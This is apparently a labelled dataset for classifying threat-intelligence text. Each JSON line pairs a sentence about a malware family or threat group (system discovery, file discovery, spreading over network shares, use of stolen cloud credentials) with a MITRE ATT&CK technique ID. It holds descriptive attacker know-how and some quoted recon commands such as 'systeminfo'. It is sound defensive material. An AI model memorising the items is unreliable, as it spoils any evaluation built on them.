{"text1":"Ke3chang has used compromised credentials to sign into victims\u2019 Microsoft 365 accounts.","labels":"['T1078.004']"}
{"text1":"Peirates can use stolen service account tokens to perform its operations.","labels":"['T1078.004']"}
{"text1":"ROADTools leverages valid cloud credentials to perform enumeration operations using the internal Azure AD Graph API.","labels":"['T1078.004']"}
{"text1":"BRONZE BUTLER has placed malware on file shares and given it the same name as legitimate documents on the share.","labels":"['T1080']"}
{"text1":"Conti can spread itself by infecting other remote machines via network shared drives.","labels":"['T1080']"}
{"text1":"Darkhotel used a virus that propagates by infecting executables stored on shared drives.","labels":"['T1080']"}
{"text1":"Gamaredon Group has injected malicious macros into all Word and Excel documents on mapped network drives.","labels":"['T1080']"}
{"text1":"H1N1 has functionality to copy itself to network shares.","labels":"['T1080']"}
{"text1":"Ramsay can spread itself by infecting other portable executable files on networks shared drives.","labels":"['T1080']"}
{"text1":"Ursnif has copied itself to and infected files in network drives for propagation.","labels":"['T1080']"}
{"text1":"4H RAT sends an OS version identifier in its beacons.","labels":"['T1082']"}
{"text1":"A Gamaredon Group file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.","labels":"['T1082']"}
{"text1":"A module in Prikormka collects information from the victim about Windows OS version, computer name, battery info, and physical memory.","labels":"['T1082']"}
{"text1":"ADVSTORESHELL can run Systeminfo to gather information about the victim.","labels":"['T1082']"}
{"text1":"APT19 collected system architecture information. APT19 used an HTTP malware variant and a Port 22 malware variant to gather the hostname and CPU information from the victim\u2019s machine.","labels":"['T1082']"}
{"text1":"APT28 has enumerated installed applications on macOS devices with built-in utilities such as \"ls -al \/Applications\".","labels":"['T1082']"}
{"text1":"APT3 has a tool that can obtain information about the local system.","labels":"['T1082']"}
{"text1":"APT32 has collected the OS version and computer name from victims. One of the group's backdoors can also query the Windows Registry to gather system information, and another macOS backdoor performs a fingerprint of the machine on its first connection to the C&C server. APT32 executed shellcode to identify the name of the infected host.","labels":"['T1082']"}
{"text1":"APT38 has attempted to get detailed information about a compromised host, including the operating system, version, patches, hotfixes, and service packs.","labels":"['T1082']"}
{"text1":"Action RAT has the ability to collect the hostname, OS version, and OS architecture of an infected host.","labels":"['T1082']"}
{"text1":"Agent Tesla can collect the system's computer name and also has the capability to collect information on the processor, memory, OS, and video card from the system.","labels":"['T1082']"}
{"text1":"Amadey has collected the computer name and OS version from a compromised machine.","labels":"['T1082']"}
{"text1":"Anchor can determine the hostname and linux version on a compromised host.","labels":"['T1082']"}
{"text1":"AppleJeus has collected the victim host information after infection.","labels":"['T1082']"}
{"text1":"Aquatic Panda has used native OS commands to understand privilege levels and system details.","labels":"['T1082']"}
{"text1":"Aria-body has the ability to identify the hostname, computer name, Windows version, processor speed, machine GUID, and disk information on a compromised host.","labels":"['T1082']"}
{"text1":"Attor monitors the free disk space on the system.","labels":"['T1082']"}
{"text1":"AuTo Stealer has the ability to collect the hostname and OS information from an infected host.","labels":"['T1082']"}
{"text1":"Avenger has the ability to identify the host volume ID and the OS architecture on a compromised host.","labels":"['T1082']"}
{"text1":"Azorult can collect the machine information, system architecture, the OS version, computer name, Windows product name, the number of CPU cores, video card information, and the system language.","labels":"['T1082']"}
{"text1":"BADCALL collects the computer name and host name on the compromised system.","labels":"['T1082']"}
{"text1":"BISCUIT has a command to collect the processor type, operation system, computer name, uptime, and whether the system is a laptop or PC.","labels":"['T1082']"}
{"text1":"BLUELIGHT has collected the computer name and OS version from victim machines.","labels":"['T1082']"}
{"text1":"BUBBLEWRAP collects system information, including the operating system version and hostname.","labels":"['T1082']"}
{"text1":"BabyShark has executed the \"ver\" command.","labels":"['T1082']"}
{"text1":"BackConfig has the ability to gather the victim's computer name.","labels":"['T1082']"}
{"text1":"BadPatch collects the OS system, OS version, MAC address, and the computer name from the victim\u2019s machine.","labels":"['T1082']"}
{"text1":"Bandook can collect information about the drives available on the system.","labels":"['T1082']"}
{"text1":"Bisonal has used commands and API calls to gather system information.","labels":"['T1082']"}
{"text1":"Blue Mockingbird has collected hardware details for the victim's system, including CPU and memory information.","labels":"['T1082']"}
{"text1":"Bonadan has discovered the OS version, CPU model, and RAM size of the system it has been installed on.","labels":"['T1082']"}
{"text1":"BoomBox can enumerate the hostname, domain, and IP of a compromised host.","labels":"['T1082']"}
{"text1":"Brave Prince collects hard drive content and system configuration information.","labels":"['T1082']"}
{"text1":"Bumblebee can enumerate the OS version and domain on a targeted system.","labels":"['T1082']"}
{"text1":"Bundlore will enumerate the macOS version to determine which follow-on behaviors to execute using \"\/usr\/bin\/sw_vers -productVersion\".","labels":"['T1082']"}
{"text1":"CARROTBAT has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.","labels":"['T1082']"}
{"text1":"CORESHELL collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server.","labels":"['T1082']"}
{"text1":"CaddyWiper can use `DsRoleGetPrimaryDomainInformation` to determine the role of the infected machine. CaddyWiper can also halt execution if the compromised host is identified as a domain controller.","labels":"['T1082']"}
{"text1":"Cadelspy has the ability to discover information about the compromised host.","labels":"['T1082']"}
{"text1":"Cannon can gather system information from the victim\u2019s machine such as the OS version, machine name, and drive information.","labels":"['T1082']"}
{"text1":"Carberp has collected the operating system version from the infected system.","labels":"['T1082']"}
{"text1":"Cardinal RAT can collect the hostname, Microsoft Windows version, and processor architecture from a victim machine.","labels":"['T1082']"}
{"text1":"ChChes collects the victim hostname, window resolution, and Microsoft Windows version.","labels":"['T1082']"}
{"text1":"Chaes has collected system information, including the machine name and OS version.","labels":"['T1082']"}
{"text1":"CharmPower can enumerate the OS version and computer name on a targeted system.","labels":"['T1082']"}
{"text1":"Chimera has used `fsutil fsinfo drives`, `systeminfo`, and `vssadmin list shadows` for system information including shadow volumes and drive information.","labels":"['T1082']"}
{"text1":"Chrommme has the ability to list drives and obtain the computer name of a compromised host.","labels":"['T1082']"}
{"text1":"Clambling can discover the hostname, computer name, and Windows version of a targeted machine.","labels":"['T1082']"}
{"text1":"Comnie collects the hostname of the victim machine.","labels":"['T1082']"}
{"text1":"Confucius has used a file stealer that can examine system drives, including those other than the C drive.","labels":"['T1082']"}
{"text1":"CrackMapExec can enumerate the system drives and associated system name.","labels":"['T1082']"}
{"text1":"Crimson contains a command to collect the victim PC name, disk drive information, and operating system.","labels":"['T1082']"}
{"text1":"Cuba can enumerate local drives, disk type, and disk free space.","labels":"['T1082']"}
{"text1":"Cyclops Blink has the ability to query device information.","labels":"['T1082']"}
{"text1":"DarkComet can collect the computer name, RAM used, and operating system version from the victim\u2019s machine.","labels":"['T1082']"}
{"text1":"DarkWatchman can collect the OS version, system architecture, uptime, and computer name.","labels":"['T1082']"}
{"text1":"Denis collects OS information and the computer name from the victim\u2019s machine.","labels":"['T1082']"}
{"text1":"Derusbi gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system.","labels":"['T1082']"}
{"text1":"Diavol can collect the computer name and OS version from the system.","labels":"['T1082']"}
{"text1":"DownPaper collects the victim host name and serial number, and then sends the information to the C2 server.","labels":"['T1082']"}
{"text1":"DropBook has checked for the presence of Arabic language in the infected machine's settings.","labels":"['T1082', 'T1614.001']"}
{"text1":"Dtrack can collect the victim's computer name, hostname and adapter information to create a unique identifier.","labels":"['T1082']"}
{"text1":"During FunnyDream, the threat actors used Systeminfo to collect information on targeted hosts.","labels":"['T1082']"}
{"text1":"During Operation CuckooBees, the threat actors used the `systeminfo` command to gather details about a compromised system.","labels":"['T1082']"}
{"text1":"During Operation Wocao, threat actors discovered the local disks attached to the system and their hardware information including manufacturer and model, as well as the OS versions of systems connected to a targeted network.","labels":"['T1082']"}
{"text1":"DustySky extracts basic information about the operating system.","labels":"['T1082']"}
{"text1":"EVILNUM can obtain the computer name from the victim's system.","labels":"['T1082']"}
{"text1":"Egregor can perform a language check of the infected system and can query the CPU information (cupid).","labels":"['T1082']"}
{"text1":"Elise executes \"systeminfo\" after initial communication is made to the remote server.","labels":"['T1082']"}
{"text1":"Emissary has the capability to execute ver and systeminfo commands.","labels":"['T1082']"}
{"text1":"Empire can enumerate host system information like OS, architecture, domain name, applied patches, and more.","labels":"['T1082']"}
{"text1":"EnvyScout can determine whether the ISO payload was received by a Windows or iOS device.","labels":"['T1082']"}
{"text1":"Epic collects the OS version, hardware information, computer name, available system memory status, disk space information, and system and user language settings.","labels":"['T1082']"}
{"text1":"Explosive has collected the computer name from the infected host.","labels":"['T1082']"}
{"text1":"FALLCHILL can collect operating system (OS) version information, processor information, system name, and information about installed disks from the victim.","labels":"['T1082']"}
{"text1":"FELIXROOT collects the victim\u2019s computer name, processor architecture, OS version, volume serial number, and system type.","labels":"['T1082']"}
{"text1":"Ferocious can use \"GET.WORKSPACE\" in Microsoft Excel to determine the OS version of the compromised host.","labels":"['T1082']"}
{"text1":"Final1stspy obtains victim Microsoft Windows version information and CPU architecture.","labels":"['T1082']"}
{"text1":"GRIFFON has used a reconnaissance module that can be used to retrieve information about a victim's computer, including the resolution of the workstation .","labels":"['T1082']"}
{"text1":"Gelsemium can determine the operating system and whether a targeted machine has a 32 or 64 bit architecture.","labels":"['T1082']"}
{"text1":"Gold Dragon collects endpoint information using the \"systeminfo\" command.","labels":"['T1082']"}
{"text1":"GravityRAT collects the MAC address, computer name, and CPU information.","labels":"['T1082']"}
{"text1":"Green Lambert can use `uname` to identify the operating system name, version, and processor type.","labels":"['T1082']"}
{"text1":"GrimAgent can collect the OS, and build version on a compromised host.","labels":"['T1082']"}
{"text1":"HAWKBALL can collect the OS version, architecture information, and computer name.","labels":"['T1082']"}
{"text1":"HELLOKITTY can enumerate logical drives on a target system.","labels":"['T1082']"}
{"text1":"HEXANE has collected the hostname of a compromised machine.","labels":"['T1082']"}
{"text1":"HermeticWiper can determine the OS version, bitness, and enumerate physical drives on a targeted host.","labels":"['T1082']"}
{"text1":"Heyoka Backdoor can enumerate drives on a compromised host.","labels":"['T1082']"}
{"text1":"Higaisa collected the system volume serial number, GUID, and computer name.","labels":"['T1082']"}
{"text1":"Hildegard has collected the host's OS, CPU, and memory information.","labels":"['T1082']"}
{"text1":"HotCroissant has the ability to determine if the current user is an administrator, Windows product name, processor name, screen resolution, and physical RAM of the infected host.","labels":"['T1082']"}
{"text1":"Hydraq creates a backdoor through which remote attackers can retrieve information such as computer name, OS version, processor speed, memory size, and CPU speed.","labels":"['T1082']"}
{"text1":"IcedID has the ability to identify the computer name and OS version on a compromised host.","labels":"['T1082']"}
{"text1":"Inception has used a reconnaissance module to gather information about the operating system and hardware on the infected host.","labels":"['T1082']"}
{"text1":"Industroyer collects the victim machine\u2019s Windows GUID.","labels":"['T1082']"}
{"text1":"InnaputRAT gathers volume drive information and system information.","labels":"['T1082']"}
{"text1":"Ixeshe collects the computer name of the victim's system during the initial infection.","labels":"['T1082']"}
{"text1":"JPIN can obtain system information such as OS version and disk space.","labels":"['T1082']"}
{"text1":"KARAE can collect system information.","labels":"['T1082']"}
{"text1":"KGH_SPY can collect drive information from a compromised host.","labels":"['T1082']"}
{"text1":"KOMPROGO is capable of retrieving information about the infected system.","labels":"['T1082']"}
{"text1":"KONNI can gather the OS version, architecture information, connected drives, hostname, RAM size, and disk space information from the victim\u2019s machine and has used \"cmd \/c systeminfo\" command to get a snapshot of the current system state of the target machine.","labels":"['T1082']"}
{"text1":"Kasidet has the ability to obtain a victim's system name and operating system version.","labels":"['T1082']"}
{"text1":"Kazuar gathers information on the system and local drives.","labels":"['T1082']"}
{"text1":"Ke3chang performs operating system information discovery using \"systeminfo\" and has used implants to identify the system language and computer name.","labels":"['T1082']"}
{"text1":"Kessel has collected the system architecture, OS version, and MAC address information.","labels":"['T1082']"}
{"text1":"Kevin can enumerate the OS version and hostname of a targeted machine.","labels":"['T1082']"}
{"text1":"KeyBoy can gather extended system information, such as information about the operating system, disks, and memory.","labels":"['T1082']"}
{"text1":"KillDisk retrieves the hard disk name by calling the \"CreateFileA to \\\\.\\PHYSICALDRIVE0\" API.","labels":"['T1082']"}
{"text1":"Kimsuky has enumerated drives, OS type, OS version, and other information using a script or the \"systeminfo\" command.","labels":"['T1082']"}
{"text1":"Koadic can obtain the OS version and build, computer name, and processor architecture from a compromised host.","labels":"['T1082']"}
{"text1":"Kobalos can record the hostname and kernel version of the target machine.","labels":"['T1082']"}
{"text1":"Kwampirs collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands \"systeminfo\", \"net config workstation\", \"hostname\", \"ver\", \"set\", and \"date \/t\".","labels":"['T1082']"}
{"text1":"Linfo creates a backdoor through which remote attackers can retrieve system information.","labels":"['T1082']"}
{"text1":"LitePower has the ability to list local drives and enumerate the OS architecture.","labels":"['T1082']"}
{"text1":"Lizar can collect the computer name from the machine,.","labels":"['T1082']"}
{"text1":"Lokibot has the ability to discover the computer name and Windows product name\/version.","labels":"['T1082']"}
{"text1":"LoudMiner has monitored CPU usage.","labels":"['T1082']"}
{"text1":"MacMa can collect information about a compromised computer, including: Hardware UUID, Mac serial number, macOS version, and disk sizes.","labels":"['T1082']"}
{"text1":"Magic Hound malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer\/host name to send to the C2 server.","labels":"['T1082']"}
{"text1":"MarkiRAT can obtain the computer name from a compromised host.","labels":"['T1082']"}
{"text1":"Metamorfo has collected the hostname and operating system version from the compromised host.","labels":"['T1082']"}
{"text1":"Meteor has the ability to discover the hostname of a compromised host.","labels":"['T1082']"}
{"text1":"Milan can enumerate the targeted machine's name and GUID.","labels":"['T1082']"}
{"text1":"MiniDuke can gather the hostname on a compromised machine.","labels":"['T1082']"}
{"text1":"MobileOrder has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information.","labels":"['T1082']"}
{"text1":"Mongall can identify drives on compromised hosts and retrieve the hostname via `gethostbyname`.","labels":"['T1082']"}
{"text1":"MoonWind can obtain the victim hostname, Windows version, RAM amount, number of drives, and screen resolution.","labels":"['T1082']"}
{"text1":"More_eggs has the capability to gather the OS version and computer name.","labels":"['T1082']"}
{"text1":"MuddyWater has used malware that can collect the victim\u2019s OS version and machine name.","labels":"['T1082']"}
{"text1":"Mustang Panda has gathered system information using \"systeminfo\".","labels":"['T1082']"}
{"text1":"NETWIRE can discover and collect victim system information.","labels":"['T1082']"}
{"text1":"Naid collects a unique identifier (UID) from a compromised host.","labels":"['T1082']"}
{"text1":"Nebulae can discover logical drive information including the drive type, free space, and volume information.","labels":"['T1082']"}
{"text1":"Netwalker can determine the system architecture it is running on to choose which version of the DLL to use.","labels":"['T1082']"}
{"text1":"OSInfo discovers information about the infected machine.","labels":"['T1082']"}
{"text1":"OceanSalt can collect the computer name from the system.","labels":"['T1082']"}
{"text1":"OilRig has run \"hostname\" and \"systeminfo\" on a victim.","labels":"['T1082']"}
{"text1":"Okrum can collect computer name, locale information, and information about the OS and architecture.","labels":"['T1082']"}
{"text1":"Orz can gather the victim OS version and whether it is 64 or 32 bit.","labels":"['T1082']"}
{"text1":"POWERSTATS can retrieve OS name\/architecture and computer\/domain name information from compromised hosts.","labels":"['T1082']"}
{"text1":"PUNCHBUGGY can gather system information such as computer names.","labels":"['T1082']"}
{"text1":"Pasam creates a backdoor through which remote attackers can retrieve information such as hostname and free disk space.","labels":"['T1082']"}
{"text1":"Patchwork collected the victim computer name, OS version, and architecture type and sent the information to its C2 server. Patchwork also enumerated all available drives on the victim's machine.","labels":"['T1082']"}
{"text1":"Penquin can report the file system type and disk space of a compromised host to C2.","labels":"['T1082']"}
{"text1":"PipeMon can collect and send OS version and computer name as a part of its C2 beacon.","labels":"['T1082']"}
{"text1":"PoetRAT has the ability to gather information about the compromised host.","labels":"['T1082']"}
{"text1":"Pony has collected the Service Pack, language, and region information to send to the C2.","labels":"['T1082']"}
{"text1":"PoshC2 contains modules, such as \"Get-ComputerInfo\", for enumerating common system information.","labels":"['T1082']"}
{"text1":"PowerShower has collected system information on the infected host.","labels":"['T1082']"}
{"text1":"Proxysvc collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system.","labels":"['T1082']"}
{"text1":"QakBot can collect system information including the OS version and domain on a compromised host.","labels":"['T1082']"}
{"text1":"QuasarRAT can gather system information from the victim\u2019s machine including the OS type.","labels":"['T1082']"}
{"text1":"RATANKBA gathers information about the OS architecture, OS name, and OS version\/Service pack.","labels":"['T1082']"}
{"text1":"REvil can identify the username, machine name, system language, keyboard layout, OS version, and system drive information on a compromised host.","labels":"['T1082']"}
{"text1":"ROKRAT can gather the hostname and the OS version to ensure it doesn\u2019t run on a Windows XP or Windows Server 2003 systems.","labels":"['T1082']"}
{"text1":"RTM can obtain the computer name, OS version, and default language identifier.","labels":"['T1082']"}
{"text1":"Ramsay can detect system information--including disk names, total space, and remaining space--to create a hardware profile GUID which acts as a system identifier for operators.","labels":"['T1082']"}
{"text1":"Reaver collects system information from the victim, including CPU speed, computer name, volume serial number, ANSI code page, OEM code page identifier for the OS, Microsoft Windows version, and memory information.","labels":"['T1082']"}
{"text1":"RedLeaves can gather extended system information including the hostname, OS version number, platform, memory information, time elapsed since system startup, and CPU information.","labels":"['T1082']"}
{"text1":"Remsec can obtain the OS version information, computer name, processor architecture, machine role, and OS edition.","labels":"['T1082']"}
{"text1":"Revenge RAT collects the CPU information, OS information, and system language.","labels":"['T1082']"}
{"text1":"Rifdoor has the ability to identify the Windows version on the compromised host.","labels":"['T1082']"}
{"text1":"Rising Sun can detect the computer name, operating system, and drive information, including drive type, total number of bytes on disk, total number of free bytes on disk, and name of a specified volume.","labels":"['T1082']"}
{"text1":"Rocke has used uname -m to collect the name and information about the infected system's kernel.","labels":"['T1082']"}
{"text1":"RogueRobin gathers BIOS versions and manufacturers, the number of CPU cores, the total physical memory, and the computer name.","labels":"['T1082']"}
{"text1":"RunningRAT gathers the OS version, logical drives information, processor information, and volume information.","labels":"['T1082']"}
{"text1":"Ryuk has called \"GetLogicalDrives\" to emumerate all mounted drives, and \"GetDriveTypeW\" to determine the drive type.","labels":"['T1082']"}
{"text1":"SDBbot has the ability to identify the OS version, OS bit information and computer name.","labels":"['T1082']"}
{"text1":"SHARPSTATS has the ability to identify the IP address, machine name, and OS of the compromised host.","labels":"['T1082']"}
{"text1":"SILENTTRINITY can collect information related to a compromised host, including OS version and a list of drives.","labels":"['T1082']"}
{"text1":"SLOWDRIFT collects and sends system information to its C2.","labels":"['T1082']"}
{"text1":"SMOKEDHAM has used the \"systeminfo\" command on a compromised host.","labels":"['T1082']"}
{"text1":"SOUNDBITE is capable of gathering system information.","labels":"['T1082']"}
{"text1":"STARWHALE can gather the computer name of an infected host.","labels":"['T1082']"}
{"text1":"SUNBURST collected hostname, OS version, and device uptime.","labels":"['T1082']"}
{"text1":"SYSCON has the ability to use Systeminfo to identify system information.","labels":"['T1082']"}
{"text1":"Saint Bot can identify the OS version, CPU, and other details from a victim's machine.","labels":"['T1082']"}
{"text1":"Sandworm Team used a backdoor to enumerate information about the infected system's operating system.","labels":"['T1082']"}
{"text1":"ServHelper will attempt to enumerate Windows version and system architecture.","labels":"['T1082']"}
{"text1":"Several Lazarus Group malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by Lazarus Group also collects disk space information and sends it to its C2 server.","labels":"['T1082']"}
{"text1":"ShadowPad has discovered system information including memory status, CPU frequency, OS versions, and volume serial numbers.","labels":"['T1082']"}
{"text1":"SideTwist can collect the computer name of a targeted system.","labels":"['T1082']"}
{"text1":"Skidmap has the ability to check whether the infected system\u2019s OS is Debian or RHEL\/CentOS to determine which cryptocurrency miner it should use.","labels":"['T1082']"}
{"text1":"SodaMaster can enumerate the host name and OS version on a target system.","labels":"['T1082']"}
{"text1":"SombRAT can execute \"getinfo\" to enumerate the computer name and OS version of a compromised system.","labels":"['T1082']"}
{"text1":"SoreFang can collect the hostname, operating system configuration, product ID, and disk space on victim machines by executing Systeminfo.","labels":"['T1082']"}
{"text1":"Sowbug obtained OS version and hardware configuration from a victim.","labels":"['T1082']"}
{"text1":"Spark can collect the hostname, keyboard layout, and language from the system.","labels":"['T1082']"}
{"text1":"Squirrelwaffle has gathered victim computer information and configurations.","labels":"['T1082']"}
{"text1":"Stealth Falcon malware gathers system information via WMI, including the system directory, build number, serial number, version, manufacturer, model, and total physical memory.","labels":"['T1082']"}
{"text1":"StoneDrill has the capability to discover the system OS, Windows version, architecture and environment.","labels":"['T1082']"}
{"text1":"StreamEx has the ability to enumerate system information.","labels":"['T1082']"}
{"text1":"StrifeWater can collect the OS version, architecture, and machine name to create a unique token for the infected host.","labels":"['T1082']"}
{"text1":"StrongPity can identify the hard disk volume serial number on a compromised host.","labels":"['T1082']"}
{"text1":"SysUpdate can determine whether a system has a 32 bit or 64 bit architecture.","labels":"['T1082']"}
{"text1":"Systeminfo can be used to gather information about the operating system.","labels":"['T1082']"}
{"text1":"TeamTNT has searched for system version, architecture, disk partition, logical volume, and hostname information.","labels":"['T1082']"}
{"text1":"The IceApple Server Variable Dumper module iterates over all server variables present for the current request and returns them to the adversary.","labels":"['T1082']"}
{"text1":"The initial beacon packet for Mis-Type contains the operating system version and file system of the victim.","labels":"['T1082']"}
{"text1":"The initial beacon packet for Misdat contains the operating system version of the victim.","labels":"['T1082']"}
{"text1":"The initial beacon packet for S-Type contains the operating system version and file system of the victim.","labels":"['T1082']"}
{"text1":"ThreatNeedle can collect system profile information from a compromised host.","labels":"['T1082']"}
{"text1":"Trojan.Karagany can capture information regarding the victim's OS, security, and hardware configuration.","labels":"['T1082']"}
{"text1":"Tropic Trooper has detected a target system\u2019s OS version and system volume information.","labels":"['T1082']"}
{"text1":"Tropic Trooper has detected a target system\u2019s OS version.","labels":"['T1082']"}
{"text1":"Turla surveys a system upon check-in to discover operating system configuration details using the \"systeminfo\" and \"set\" commands.","labels":"['T1082']"}
{"text1":"UPPERCUT has the capability to gather the system\u2019s hostname and OS version.","labels":"['T1082']"}
{"text1":"Ursnif has used Systeminfo to gather system information.","labels":"['T1082']"}
{"text1":"VERMIN collects the OS name, machine name, and architecture information.","labels":"['T1082']"}
{"text1":"Valak can determine the Windows version and computer name on a compromised host.","labels":"['T1082']"}
{"text1":"Volgmer can gather system information, the computer name, OS version, drive and serial information from the victim's machine.","labels":"['T1082']"}
{"text1":"WINDSHIELD can gather the victim computer name.","labels":"['T1082']"}
{"text1":"WINERACK can gather information about the host.","labels":"['T1082']"}
{"text1":"WellMess can identify the computer name of a compromised host.","labels":"['T1082']"}
{"text1":"WhisperGate has the ability to enumerate fixed logical drives on a targeted system.","labels":"['T1082']"}
{"text1":"WinMM collects the system name, OS version including service pack, and system install date and sends the information to the C2 server.","labels":"['T1082']"}
{"text1":"Windigo has used a script to detect which Linux distribution and version is currently installed on the system.","labels":"['T1082']"}
{"text1":"Windshift has used malware to identify the computer name of a compromised host.","labels":"['T1082']"}
{"text1":"Wingbird checks the victim OS version after executing to determine where to drop files based on whether the victim is 32-bit or 64-bit.","labels":"['T1082']"}
{"text1":"Winnti for Windows can determine if the OS on a compromised host is newer than Windows XP.","labels":"['T1082']"}
{"text1":"XAgentOSX contains the getInstalledAPP function to run \"ls -la \/Applications\" to gather what applications are installed.","labels":"['T1082']"}
{"text1":"XCSSET identifies the macOS version and uses \"ioreg\" to determine serial number.","labels":"['T1082']"}
{"text1":"YAHOYAH checks for the system\u2019s Windows OS version and hostname.","labels":"['T1082']"}
{"text1":"ZIRCONIUM has used a tool to capture the processor architecture of a compromised host in order to register it with C2.","labels":"['T1082']"}
{"text1":"ZeroT gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server.","labels":"['T1082']"}
{"text1":"Zeus Panda collects the OS version, system architecture, computer name, product ID, install date, and information on the keyboard mapping to determine the language used on the system.","labels":"['T1082']"}
{"text1":"Zox can enumerate attached drives.","labels":"['T1082']"}
{"text1":"ZxShell can collect the local hostname, operating system details, CPU speed, and total physical memory.","labels":"['T1082']"}
{"text1":"ZxxZ has collected the host name and operating system product name from a compromised machine.","labels":"['T1082']"}
{"text1":"admin@338 actors used the following commands after exploiting a machine with LOWBALL malware to obtain information about the OS: \"ver >> %temp%\\download\" \"systeminfo >> %temp%\\download\"","labels":"['T1082']"}
{"text1":"build_downer has the ability to send system volume information to C2.","labels":"['T1082']"}
{"text1":"cmd can be used to find information about the operating system.","labels":"['T1082']"}
{"text1":"down_new has the ability to identify the system volume information of a compromised host.","labels":"['T1082']"}
{"text1":"gh0st RAT has gathered system architecture, processor, OS configuration, and installed hardware information.","labels":"['T1082']"}
{"text1":"jRAT collects information about the OS (version, build type, install date) as well as system up-time upon receiving a connection from a backdoor.","labels":"['T1082']"}
{"text1":"njRAT enumerates the victim operating system and computer name during the initial infection.","labels":"['T1082']"}
{"text1":"3PARA RAT has a command to retrieve metadata for files on disk as well as a command to list the current working directory.","labels":"['T1083']"}
{"text1":"4H RAT has the capability to obtain file and directory listings.","labels":"['T1083']"}
{"text1":"A Patchwork payload has searched all fixed drives on the victim for files matching a specified list of extensions.","labels":"['T1083']"}
{"text1":"A module in Prikormka collects information about the paths, size, and creation time of files with specific file extensions, but not the actual content of the file.","labels":"['T1083']"}
{"text1":"A variant of Elise executes \"dir C:\\progra~1\" when initially run.","labels":"['T1083']"}
{"text1":"A version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together.","labels":"['T1083']"}
{"text1":"ADVSTORESHELL can list files and directories.","labels":"['T1083']"}
{"text1":"APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection. The group also searched a compromised DCCC computer for specific terms.","labels":"['T1083']"}
{"text1":"APT29 obtained information about the configured Exchange virtual directory using \"Get-WebServicesVirtualDirectory\".","labels":"['T1083']"}
{"text1":"APT3 has a tool that looks for files and directories on the local file system.","labels":"['T1083']"}
{"text1":"APT32's backdoor possesses the capability to list files and directories on a machine.","labels":"['T1083']"}
{"text1":"APT38 have enumerated files and directories, or searched in specific locations within a compromised host.","labels":"['T1083']"}
{"text1":"Action RAT has the ability to collect drive and file information on an infected machine.","labels":"['T1083']"}
{"text1":"Amadey has searched for folders associated with antivirus software.","labels":"['T1083']"}
{"text1":"Aoqin Dragon has run scripts to identify file formats including Microsoft Word.","labels":"['T1083']"}
{"text1":"AppleSeed has the ability to search for .txt, .ppt, .hwp, .pdf, and .doc files in specified directories.","labels":"['T1083']"}
{"text1":"Aria-body has the ability to gather metadata from a file and to search for file and directory names.","labels":"['T1083']"}
{"text1":"Attor has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files.","labels":"['T1083']"}
{"text1":"AuditCred can search through folders and files on the system.","labels":"['T1083']"}
{"text1":"AutoIt backdoor is capable of identifying documents on the victim with the following extensions: .doc; .pdf, .csv, .ppt, .docx, .pst, .xls, .xlsx, .pptx, and .jpeg.","labels":"['T1083']"}
{"text1":"Avaddon has searched for specific files prior to encryption.","labels":"['T1083']"}
{"text1":"Avenger has the ability to browse files in directories such as Program Files and the Desktop.","labels":"['T1083']"}
{"text1":"Azorult can recursively search for files in folders and collects files from the desktop with certain extensions.","labels":"['T1083']"}
{"text1":"BACKSPACE allows adversaries to search for files.","labels":"['T1083']"}
{"text1":"BADNEWS identifies files with certain extensions from USB devices, then copies them to a predefined directory.","labels":"['T1083']"}
{"text1":"BBSRAT can list file and directory information.","labels":"['T1083']"}
{"text1":"BLACKCOFFEE has the capability to enumerate files.","labels":"['T1083']"}
{"text1":"BLINDINGCAN can search, read, write, move, and execute files.","labels":"['T1083']"}
{"text1":"BRONZE BUTLER has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal.","labels":"['T1083']"}
{"text1":"Babuk has the ability to enumerate files on a targeted system.","labels":"['T1083']"}
{"text1":"BabyShark has used \"dir\" to search for \"programfiles\" and \"appdata\".","labels":"['T1083']"}
{"text1":"BackConfig has the ability to identify folders and files related to previous infections.","labels":"['T1083']"}
{"text1":"Backdoor.Oldrea collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files.","labels":"['T1083']"}
{"text1":"BadPatch searches for files with specific file extensions.","labels":"['T1083']"}
{"text1":"Bandook has a command to list files on a system.","labels":"['T1083']"}
{"text1":"Bazar can enumerate the victim's desktop.","labels":"['T1083']"}
{"text1":"BlackMould has the ability to find files on the targeted system.","labels":"['T1083']"}
{"text1":"BoomBox can search for specific files and directories on a machine.","labels":"['T1083']"}
{"text1":"BoxCaon has searched for files on the system, such as documents located in the desktop folder.","labels":"['T1083']"}
{"text1":"Brave Prince gathers file and directory information from the victim\u2019s machine.","labels":"['T1083']"}
{"text1":"CaddyWiper can enumerate all files and directories on a compromised host.","labels":"['T1083']"}
{"text1":"Cardinal RAT checks its current working directory upon execution and also contains watchdog functionality that ensures its executable is located in the correct path (else it will rewrite the payload).","labels":"['T1083']"}
{"text1":"Caterpillar WebShell can search for files in directories.","labels":"['T1083']"}
{"text1":"ChChes collects the victim's %TEMP% directory path and version of Internet Explorer.","labels":"['T1083']"}
{"text1":"CharmPower can enumerate drives and list the contents of the C: drive on a victim's computer.","labels":"['T1083']"}
{"text1":"Chimera has utilized multiple commands to identify data of interest in file and directory listings.","labels":"['T1083']"}
{"text1":"China Chopper's server component can list directory contents.","labels":"['T1083']"}
{"text1":"Clambling can browse directories on a compromised host.","labels":"['T1083']"}
{"text1":"Clop has searched folders and subfolders for files to encrypt.","labels":"['T1083']"}
{"text1":"Cobalt Strike can explore files on a compromised system.","labels":"['T1083']"}
{"text1":"Confucius has used a file stealer that checks the Document, Downloads, Desktop, and Picture folders for documents and images with specific extensions.","labels":"['T1083']"}
{"text1":"Conti can discover files on a local system.","labels":"['T1083']"}
